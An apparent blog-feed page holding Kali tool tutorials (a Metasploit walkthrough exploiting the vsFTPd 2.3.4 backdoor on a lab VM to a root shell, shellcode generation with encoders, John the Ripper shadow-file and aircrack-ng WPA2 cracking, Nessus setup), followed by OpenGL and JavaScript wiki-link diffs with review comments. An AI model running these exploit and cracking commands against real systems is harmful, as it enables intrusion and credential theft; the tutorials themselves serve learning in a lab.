[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, 192.168.63.156 would be our target machine, since the others don’t look like normal devices.

In addition, of course, one can use Nmap to do all the work for this part instead:

nmap -v -sV 192.168.63.1/24

Port Scanning

Then, we scan for the open ports of our target machine (192.168.63.156):

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name         Current Setting  Required  Description
----         ---------------  --------  -----------
CONCURRENCY  10               yes       The number of concurrent ports to check per host
PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS       192.168.63.156   yes       The target address range or CIDR identifier
THREADS      50               yes       The number of concurrent threads
TIMEOUT      1000             yes       The socket connect timeout in milliseconds
msf auxiliary(tcp) > run

[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (omitted)

By knowing which ports the machine is using, we can know which services are running on it.

2. Find Vulnerability

To find a vulnerability, we may need to know the version of the service and look it up in the database to see if there’s any known vulnerability.

Find Versions

SSH:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run

[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

FTP:

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run

[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the target machine is running vsFTPd 2.3.4.

Check Database

Let’s focus on vsFTPd, which is more likely to be vulnerable compared to SSH. So, go to exploit-db, search for the keyword “vsFTPd”, and luckily we get “VSFTPD 2.3.4 - Backdoor Command Execution”.

To sum up what we’ve got so far: the target machine is running an outdated service which contains a well-known flaw.

Find the Exploit Method

Then, let’s search for it in Metasploit:

msf > search vsftpd

Matching Modules
================

Name                                  Disclosure Date  Rank       Description
----                                  ---------------  ----       -----------
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

Nice, the module exploit/unix/ftp/vsftpd_234_backdoor is what we need now.

3. Exploit

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

Name               Disclosure Date  Rank    Description
----               ---------------  ----    -----------
cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.63.156   yes       The target address
RPORT  21               yes       The target port


Payload options (cmd/unix/interact):

Name  Current Setting  Required  Description
----  ---------------  --------  -----------


Exploit target:

Id  Name
--  ----
0   Automatic

There’s only one payload we can apply for this exploit, cmd/unix/interact, which means that the interaction will be set up directly after exploitation.

Now, we succeed:

msf exploit(vsftpd_234_backdoor) > run

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800

whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Custom Payload

In some cases, we may need custom payloads, like what I did for Secure Programming class in 2014.

Pick a payload and generate its shellcode (using payload/windows/shell_bind_tcp as an example here):

msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=

Keep specific characters out of the shellcode (taking \x00 as an example):

msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=

So, we get a payload without \x00, which is, understandably, longer than the previous one.

We can also apply encoders to the shellcode. To list all available encoders:

msf payload(shell_bind_tcp) > show encoders

Encoders
========

Name                   Disclosure Date  Rank       Description
----                   ---------------  ----       -----------
cmd/echo                                good       Echo Command Encoder
cmd/generic_sh                          manual     Generic Shell Variable Substitution Command Encoder
cmd/ifs                                 low        Generic ${IFS} Substitution Command Encoder
cmd/perl                                normal     Perl Command Encoder
cmd/powershell_base64                   excellent  Powershell Base64 Command Encoder
cmd/printf_php_mq                       manual     printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar                           manual     The EICAR Encoder
… (omitted)

Generate code with decoder:

msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=

or, all together:

msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt

# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=

Scripting

The Metasploit framework lets users write scripts to control the process. There are three ways to load a script:

  1. > msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"  
  2. > msfconsole -r my_script.rc
  3. (in msfconsole)

    msf > resource my_script.rc

Database

When conducting a penetration test, it is frequently a challenge to keep track of everything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has built-in support for the PostgreSQL database system. (Reference)

Here are some helpful commands:

  • help database
  • hosts
  • services
  • db_nmap: same as nmap, but results will be saved into the current database
  • db_import
  • db_export -f xml [filepath for xml]

Conclusion

Metasploit is a powerful tool that lets people launch attacks with the aid of its exploit database. Although this post covers only the basic usage of Metasploit, with one example that hardly conveys its strength, I will keep updating this post if I find anything new and worth sharing.

by Heron Yang (noreply@blogger.com) at March 19, 2016 12:34 PM

Kali Tool Series - John the Ripper

John the Ripper is a tool for recovering passwords by brute force. Make sure you don’t apply any of the following to others’ accounts or services. Try it on your own accounts or services.

Get Password of an Unix-like Machine

The following only works on a Unix-like machine where the user has already gained access to its files. That is, we need /etc/passwd and /etc/shadow (only /etc/passwd for an ancient machine).

> unshadow /etc/passwd /etc/shadow > ~/passwd

Use John’s default word list to crack the password:

> john ~/passwd

Use custom wordlist:

> john --wordlist=word.list ~/passwd

where word.list is your custom list.

To show the result:

> john --show ~/passwd
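
The merge step above is also a useful audit input on your own hosts: which accounts carry a fast, outdated hash scheme or no password at all. The following is an added example, not code from the original post; the account names, salts and hash bodies are constructed placeholders, and the merge is a simplified form of what `unshadow` does.

```python
import re
from typing import NamedTuple

# crypt(3) prefixes mapped to (scheme name, weak?). "Weak" means fast to
# compute, which is what makes offline guessing against the merged file cheap.
SCHEMES = {
    "$1$": ("md5crypt", True),
    "$2a$": ("bcrypt", False),
    "$2b$": ("bcrypt", False),
    "$2y$": ("bcrypt", False),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False),
}
# Traditional DES crypt has no prefix: 13 characters from the crypt alphabet.
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


class Finding(NamedTuple):
    user: str
    scheme: str
    shell: str


def unshadow(passwd_text, shadow_text):
    """Put each shadow hash into field 2 of the matching passwd record."""
    hashes = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed records
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def classify(hash_field):
    """Return (scheme, needs_attention) for one password field."""
    if hash_field == "":
        return ("empty", True)            # account has no password at all
    if hash_field[0] in "!*":
        return ("locked", False)          # password login disabled
    for prefix, (name, weak) in SCHEMES.items():
        if hash_field.startswith(prefix):
            return (name, weak)
    if DES_RE.match(hash_field):
        return ("descrypt", True)
    return ("unknown", True)              # unrecognised: review by hand


def audit(passwd_text, shadow_text):
    """List accounts whose password field needs attention."""
    findings = []
    for record in unshadow(passwd_text, shadow_text):
        fields = record.split(":")
        scheme, flagged = classify(fields[1])
        if flagged:
            findings.append(Finding(fields[0], scheme, fields[6]))
    return findings


# Constructed sample data (placeholder salts and hash bodies, not real hashes).
PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash",
    "legacy:x:1001:1001:Legacy app:/home/legacy:/bin/sh",
    "backup:x:1002:1002:Backup:/home/backup:/bin/sh",
    "guest:x:1003:1003:Guest:/home/guest:/bin/sh",
])
SHADOW = "\n".join([
    "root:$6$constructed$" + "A" * 86 + ":19000:0:99999:7:::",
    "daemon:*:19000:0:99999:7:::",
    "alice:$y$j9T$constructed$" + "B" * 43 + ":19000:0:99999:7:::",
    "legacy:$1$constructed$" + "C" * 22 + ":19000:0:99999:7:::",
    "backup:ab" + "D" * 11 + ":19000:0:99999:7:::",
    "guest::19000:0:99999:7:::",
])

if __name__ == "__main__":
    for finding in audit(PASSWD, SHADOW):
        print(f"{finding.user:8} {finding.scheme:10} shell={finding.shell}")
```

Accounts it reports should have their passwords reset so that they are re-hashed under the system's current scheme, or be locked if unused.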

Crack Wifi

Use Wordlist (WPA2)

Use wireshark or airodump-ng to get .cap file of the traffic. Then:

> aircrack-ng -w wordlist.lst -b 00:0c:29:80:9a:85 my_traffic*.cap

where the -b option gives the MAC address of your target BSSID, and the input files are those .cap files.

Try All

Another solution is to try every possible password, which is guaranteed to find the password, but it might also take forever.

> john -stdout -incremental | aircrack-ng -b 00:0c:29:80:9a:85 -w - my_traffic*.cap

Session Control

To run a long password testing process, we can make it run in the background:

> john --session=all_rules_session --wordlist=all.lst ~/passwd &

To check the session status:

> john --status=all_rules_session
0g 0:00:00:02 2/3 0g/s 411.5p/s 411.5c/s 411.5C/s

To restore the session:

> john --restore=all_rules_session
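
To put "might take forever" into numbers, this added example (not part of the original post) parses the status line shown above and projects how long an exhaustive search would take at that candidate rate. It assumes the field meanings given in John's documentation (g = cracked, p/s = candidates per second, c/s = hash computations per second, C/s = candidate/hash combinations per second), treats the sample rate as sustained, and uses the WPA2 passphrase rule of 8 to 63 printable ASCII characters.

```python
import re

HEAD_RE = re.compile(r"^(\d+)g\s+(\d+):(\d\d):(\d\d):(\d\d)\s+(.*)$")
RATE_RE = re.compile(r"([\d.]+)([KMG]?)([gpcC])/s")
MULTIPLIER = {"": 1, "K": 1e3, "M": 1e6, "G": 1e9}
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Status line copied from the session output above.
SAMPLE_STATUS = "0g 0:00:00:02 2/3 0g/s 411.5p/s 411.5c/s 411.5C/s"


def parse_status(line):
    """Split a John status line into cracked count, elapsed seconds, progress, rates."""
    head = HEAD_RE.match(line.strip())
    if not head:
        raise ValueError(f"not a status line: {line!r}")
    cracked, days, hours, minutes, seconds, rest = head.groups()
    tokens = rest.split()
    # The progress field ("2/3", "12.5%") is optional and precedes the rates.
    progress = None
    if tokens and not RATE_RE.fullmatch(tokens[0]):
        progress = tokens[0]
    rates = {
        unit: float(number) * MULTIPLIER[suffix]
        for number, suffix, unit in RATE_RE.findall(rest)
    }
    elapsed = ((int(days) * 24 + int(hours)) * 60 + int(minutes)) * 60 + int(seconds)
    return {
        "cracked": int(cracked),
        "elapsed_s": elapsed,
        "progress": progress,
        "rates": rates,
    }


def keyspace(charset_size, min_len, max_len):
    """Number of candidates of every length from min_len to max_len inclusive."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def years_to_exhaust(charset_size, min_len, max_len, candidates_per_second):
    """Worst-case duration of a full search, in years."""
    return keyspace(charset_size, min_len, max_len) / candidates_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    status = parse_status(SAMPLE_STATUS)
    rate = status["rates"]["p"]
    print(f"elapsed {status['elapsed_s']} s, stage {status['progress']}, {rate} candidates/s")
    # Shortest legal WPA2 passphrase (8 characters), three alphabets.
    for label, size in (("digits", 10), ("lowercase", 26), ("printable ASCII", 95)):
        years = years_to_exhaust(size, 8, 8, rate)
        print(f"8 chars, {label:15}: {years:,.2f} years")
    # Every extra character multiplies the work by the alphabet size.
    print(f"8 to 12 chars, lowercase: {years_to_exhaust(26, 8, 12, rate):,.0f} years")
```

The growth with length and alphabet size is the reason a long random passphrase holds up against this approach while a short or dictionary-derived one does not.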

Password Wordlist

Longer wordlists can be found online. However, Kali already ships with some wordlists that users can apply.

> ls /usr/share/wordlists/
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz

They are wordlist files from different applications:

> file /usr/share/wordlists/*
/usr/share/wordlists/dirb: symbolic link to /usr/share/dirb/wordlists
/usr/share/wordlists/dirbuster: symbolic link to /usr/share/dirbuster/wordlists
...
/usr/share/wordlists/wfuzz: symbolic link to /usr/share/wfuzz/wordlist

Interestingly, the best wordlist is actually hidden in the rockyou.txt.gz, so:

> gzip -dc < rockyou.txt.gz > ~/wordlist.txt

Then we have wordlist.txt.

by Heron Yang (noreply@blogger.com) at March 19, 2016 12:33 PM

March 14, 2016

Kali Tool Series - Nessus

Nessus is an open source vulnerability scanner, which scans a network for potential security risks and provides detailed reports.
A few facts about Nessus:
  • founded by Renaud Deraison in 1998
  • supports multiple systems: Windows, Linux, Mac OS X, Sun, Solaris, etc

Feature

  • host/port discovery
  • identifies vulnerabilities
  • checks whether the systems have the latest software patches
  • tries with default passwords, common passwords on system accounts
  • malware/botnet detection
(from reference 1 and reference 2)

Install and Setup

Download Nessus from its official site (registration is required; the Home version is free).
After installation, open https://localhost:8834/ on your machine to start Nessus.

Component

  • Reports: reports from all the past scans of a target or a set of targets
  • Scans: configure or run a new scan
  • Policies: configure the things you would like to run for the scans
  • Users: different users may have different permissions to apply different policies
(Reference)

Policy

Open https://localhost:8834/ and click the “+New Policy” button in the Policy tab.
The information of scanner templates provided by the policy wizard can be found here.

Settings

  • Basics
    • general: name / description
    • permission: private / share
  • Discovery: host discovery / port scanning / service discovery
  • Assessment: for “web application” only
  • Report: configure the scan reports
  • Advanced: performance settings, additional checks, and logging features

Scan

Click the “+New Scan” button, then pick a scanner template or a user-created policy.

General

  • name
  • description
  • folder
  • scanner
  • targets: IP or domain name (ex. 192.168.1.0/24, 192.168.2.1, example.com)
  • upload targets: a file that contains target list

Schedule

Default is disabled.
  • launch: pick its frequency - once, daily, weekly, monthly, or yearly
  • starts on: start time
  • time zone
  • summary

Email Notification

Setting up SMTP is required.

Launch

Click the play icon or the “launch” button, and the scan will start immediately.

View Results

The result page

  • Configure: directs back to the scan settings
  • Audit Trail: pulls up the audit trail dialogue
  • Launch
  • Export: allows you to save the scan result in Nessus (.nessus), PDF, HTML, CSV, or Nessus DB.

Turn On/Off Nessus

By default, Nessus runs as a service in the background.
To turn on:
sudo launchctl load -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
To turn off:
sudo launchctl unload -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist

by Heron Yang (noreply@blogger.com) at March 14, 2016 06:35 AM

February 29, 2016

ThreeJS

Created page with "* [http://davidscottlyons.com/threejs/presentations/frontporch14/#slide-1 Intro to WebGL with Three.js] by David Scott Lyons == See Also == * OpenGL"

New page

* [http://davidscottlyons.com/threejs/presentations/frontporch14/#slide-1 Intro to WebGL with Three.js] by David Scott Lyons

== See Also ==
* [[OpenGL]]

by Scott.tsai at February 29, 2016 04:15 AM

February 28, 2016

WebGL

← Older revision Revision as of 20:42, 28 February 2016
(One intermediate revision by one user not shown)
Line 1: Line 1:
* [http://gdd11-webgl.appspot.com/#1 Enter the Third Dimension: Introduction to WebGL Interactive Slides from Google Developer Day 2011 by Ilmari Heikkinen]
+
* [http://gdd11-webgl.appspot.com/#1 Enter the Third Dimension: Introduction to WebGL] -  Interactive Slides from Google Developer Day 2011 by Ilmari Heikkinen
  
 
== See Also ==
 
== See Also ==
 
* [[OpenGL]]
 
* [[OpenGL]]

by Scott.tsai at February 28, 2016 08:42 PM

WebGL

Created page with "* [http://gdd11-webgl.appspot.com/#1 Enter the Third Dimension: Introduction to WebGL Interactive Slides from Google Developer Day 2011 by Ilmari Heikkinen] == See Also == * ..."

New page

* [http://gdd11-webgl.appspot.com/#1 Enter the Third Dimension: Introduction to WebGL Interactive Slides from Google Developer Day 2011 by Ilmari Heikkinen]

== See Also ==
* [[OpenGL]]

by Scott.tsai at February 28, 2016 08:42 PM

February 23, 2016

CPU

Created page with "== See Also == Computer Architecture"

New page

== See Also ==
[[Computer Architecture]]

by Scott.tsai at February 23, 2016 08:25 PM

Hardware

← Older revision Revision as of 20:24, 23 February 2016
Line 1: Line 1:
 +
== See Also ==
 
* [[Hardware Interface Reverse Engineering]]
 
* [[Hardware Interface Reverse Engineering]]
 
* [[Hardware Interfaces]]
 
* [[Hardware Interfaces]]
 
* [[DIMM]]
 
* [[DIMM]]
 +
* [[CPU]]

by Scott.tsai at February 23, 2016 08:24 PM

February 22, 2016

Javascript

Warts

← Older revision Revision as of 23:10, 22 February 2016
(3 intermediate revisions by one user not shown)
Line 1: Line 1:
 +
== Tutorials ==
 +
* [https://gist.github.com/yig/8744917 JavaScript reference for non-JavaScript programmers] by Yotam Gingold
 
* [http://ejohn.org/apps/learn/ Learning Advanced JavaScript by John Resig]
 
* [http://ejohn.org/apps/learn/ Learning Advanced JavaScript by John Resig]
 
* [http://eloquentjavascript.net/ Eloquent JavaScript An opinionated guide to programming by Marijn Haverbeke]
 
* [http://eloquentjavascript.net/ Eloquent JavaScript An opinionated guide to programming by Marijn Haverbeke]
Line 4: Line 6:
  
 
== Warts ==
 
== Warts ==
 +
# Must use '===' for equality since <code>'1' == 1 -> true</code>
 +
# '===' is "shallow", i.e. <code>[1, 2] === [1, 2] -> false</code>
 
# Container types don't sort lexicographically but are sorted by their string representations, ex: ['a', 2] > ['a', 10]
 
# Container types don't sort lexicographically but are sorted by their string representations, ex: ['a', 2] > ['a', 10]
 +
# <code>Array(1, 2) -> [1, 2]</code> but <code>Array(10)</code> allocates an array of length 10, filled with <code>undefined</code>.
 +
## Assigning to Array.length preallocates space. Assigning length to 0 frees space.
 +
# When calling functions normally 'this' is <code>undefined</code> in "strict mode" and  <code>window</code> otherwise in ES5:
 +
<pre>function f() { return this; }
 +
f() -> window    // default
 +
f() -> undefined  // "use strict";
 +
</pre>
 +
# Dictionary (object) keys are always strings, and can't be other immutable types
 
# The boolean interpretation of some built-in types are wrong, ex: Boolean([]) -> true
 
# The boolean interpretation of some built-in types are wrong, ex: Boolean([]) -> true
 +
# Broken Unicode support: https://mathiasbynens.be/notes/javascript-unicode
 
# No signed or unsigned ints, only floats. (But see the new [https://developer.mozilla.org/en/JavaScript_typed_arrays typed arrays] support)
 
# No signed or unsigned ints, only floats. (But see the new [https://developer.mozilla.org/en/JavaScript_typed_arrays typed arrays] support)
 
# Traditionally had no byte type. (But see the new [https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array Uint8Array], [http://www.html5rocks.com/en/tutorials/file/xhr2/#toc-reponseTypeArrayBuffer ArrayBuffer from XMLHttpRequest])
 
# Traditionally had no byte type. (But see the new [https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array Uint8Array], [http://www.html5rocks.com/en/tutorials/file/xhr2/#toc-reponseTypeArrayBuffer ArrayBuffer from XMLHttpRequest])
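
Review bot: the added <pre> block for the 'this' example starts on its own line, which closes the '#' list in wiki markup, so every item after it (from "Dictionary (object) keys are always strings" onward) restarts numbering at 1. Open the block on the same line as its '#' item, or inline the three lines with <code>. The "f() -> window" result also only holds in a browser, which the item could state.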

by Scott.tsai at February 22, 2016 11:10 PM

OpenGL

← Older revision Revision as of 21:55, 22 February 2016
(3 intermediate revisions by one user not shown)
Line 1: Line 1:
 
== Tutorials ==
 
== Tutorials ==
 +
* [http://pixelshaders.com/ Pixel Shaders] An Interactive Introduction to Graphics Programming by Toby Schachman
 +
* [http://webglfundamentals.org/ WebGL Fundamentals]
 +
* [http://learnopengl.com/ Learn OpenGL (learnopengl.com)]
 +
* [http://www.opengl-tutorial.org/ opengl-tutorial.org]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
Line 5: Line 9:
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 +
* [http://www.tomdalling.com/blog/category/modern-opengl/ Tom Dalling's Modern OpenGL Series]
 +
* [http://www.codeproject.com/Articles/771225/Learning-Modern-OpenGL Learning Modern OpenGL]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead Approaching zero driver overhead]
+
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead AZDO: Approaching zero driver overhead]
 +
 
 +
== Courses ==
 +
* [https://www.udacity.com/courses/cs291 Udacity CS291: nteractive 3D Graphics]
 +
 
 +
== Blogs ==
 +
* [http://www.realtimerendering.com/blog/ Real-Time Rendering] by Ed Angel
  
 
== WebGL ==
 
== WebGL ==
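
Review bot: typo in the added Courses entry: "Udacity CS291: nteractive 3D Graphics" is missing the leading "I" of "Interactive".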
Line 15: Line 27:
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
* [http://webglstats.com/ WebGL Stats]
+
* Device support statistics: [http://webglstats.com/ WebGL Stats]
 +
* [http://webglreport.com/?v=1 WebGL Report]
 +
* [http://www.realtimerendering.com/blog/webgl-debugging-and-profiling-tools/ WebGL Debugging and Profiling Tools]
 +
* [http://webglworkshop.com/presentations/Workshop18-MakeGreat.html#/ Practical Learnings of WebGL for Make Benefit Glorious Internet of Web], Oct 2015
 +
* [https://github.com/unconed/mathbox Mathbox]: presentation-quality math diagrams and animations in WebGL
 +
* Presentation Editor: http://fhtr.org/editor/
 +
 
 +
== Sample Code ==
 +
* [http://www.g-truc.net/project-0026.html OpenGL Samples Pack]: use FreeGLUT to create window and an OpenGL context, GLEW to load OpenGL implementations, GLM as math library and to replace OpenGL fixed pipeline functions and GLI to load images.
  
 
== Mobile / Embedded ==
 
== Mobile / Embedded ==
Line 29: Line 49:
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
  
== References ==
+
== Version Supprt ==
 +
* [https://developer.apple.com/opengl/capabilities/ Mac OSX OpenGL Capabilities]
 +
 
 +
== Books ==
 +
* [http://www.amazon.com/Real-Time-Rendering-Third-Tomas-Akenine-Mo-ller-ebook/dp/B007COYODQReal-Time Rendering, 3rd Edition] by Tomas Akenine-Mo¨ller
 +
* [http://www.amazon.com/gp/product/0321399528/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0321399528&linkCode=as2&tag=bfextcodeproj-20&linkId=LKAAHY6YZCRMH57I Computer Graphics: Principles and Practice 3rd Edition]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
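
Review bot: the first added Books link has no space between the URL and its label ("...dp/B007COYODQReal-Time Rendering, 3rd Edition"), so the link target ends in "B007COYODQReal-Time" and the visible label loses "Real-Time"; insert a space after "B007COYODQ". In the same hunk, the new heading "== Version Supprt ==" should read "Version Support", and the author name "Akenine-Mo¨ller" has a detached diaeresis that should be "Akenine-Möller".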
  
Line 36: Line 61:
  
 
== Tools ==
 
== Tools ==
 +
* [https://github.com/google/ion Google Ion]: analyze grpahics scenes, trace OpenGL calls, run-time graphics state introspection and shader editing
 +
* [https://github.com/ValveSoftware/vogl vogl]: OpenGL capture / playback debugger
 
* [https://github.com/apitrace/apitrace ApiTrace]: trace OpenGL, D3D9, D3D8, D3D7, and DDRAW APIs calls to a file
 
* [https://github.com/apitrace/apitrace ApiTrace]: trace OpenGL, D3D9, D3D8, D3D7, and DDRAW APIs calls to a file
 
** retrace OpenGL calls from a file
 
** retrace OpenGL calls from a file
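
Review bot: typo in the added Google Ion entry: "analyze grpahics scenes" should be "analyze graphics scenes".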
Line 43: Line 70:
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 +
* [http://synthclipse.sourceforge.net Sythclipse]: shader authoring environment
 +
 +
== See Also ==
 +
* [[Graphics]]
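
Review bot: the added link label "Sythclipse" does not match the project name in its own URL (synthclipse.sourceforge.net); it should read "Synthclipse".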

by Scott.tsai at February 22, 2016 09:55 PM

OpenGL

← Older revision Revision as of 04:57, 22 February 2016
(One intermediate revision by one user not shown)
Line 1: Line 1:
 
== Tutorials ==
 
== Tutorials ==
 +
* [http://pixelshaders.com/ Pixel Shaders] An Interactive Introduction to Graphics Programming by Toby Schachman
 +
* [http://webglfundamentals.org/ WebGL Fundamentals]
 +
* [http://learnopengl.com/ Learn OpenGL (learnopengl.com)]
 +
* [http://www.opengl-tutorial.org/ opengl-tutorial.org]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
 
